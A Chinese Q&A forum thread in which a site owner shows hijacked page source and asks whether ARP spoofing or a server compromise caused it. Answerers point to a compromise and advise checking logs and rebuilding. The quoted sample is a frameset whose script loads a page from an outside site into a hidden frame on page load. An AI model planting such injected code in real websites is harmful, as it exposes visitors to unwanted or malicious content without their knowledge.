ARP攻击?还是被挂马了? 该咋办?是代码原因?还是服务器所处处环境?
0
悬赏园豆:40
[已解决问题]
解决于 2014-03-06 10:24
早上打开网页,源码显示如下:
------------------------------------我是分隔线-------------------------------------
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://www.114dy.net/js/ad.htm";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/manager/?UpdatedPage=SW5qZWN0">
<frame name="hi" src="">
</frameset>
</html>
------------------------------------我是分隔线-------------------------------------
上网查了下,说是一种新的ARP木马,整个网站会被挂马,表现为查看网页的源文件会看到以上代码。
1. 是代码原因?还是服务器所处处环境?
2.这个问题出现好几次了,用360的实时保护-ARP防火墙也没用,求高手指点。
最佳答案
0
ARP木马?arp是二层的,只会存在局域网里吧,360就是一泼屎,建议查看系统登录日志,你的web文件修改的时间戳,www的访问日志!
收获园豆:20
同意,360的arp就是一坨屎,没啥用
其他回答(1)
0
服务器如果确实已经中毒了,就算杀到毒也不安全了,重做吧,装一个其它的防火墙吧。服务器杀软和防火墙是必备的。服务器都会中毒,你的安全防护太差了
收获园豆:20
如果服务器不是你的,那就是机子中毒了,arp只会影响你打开网页慢或打不开,不会出现这种情况,这明显是中毒的迹象
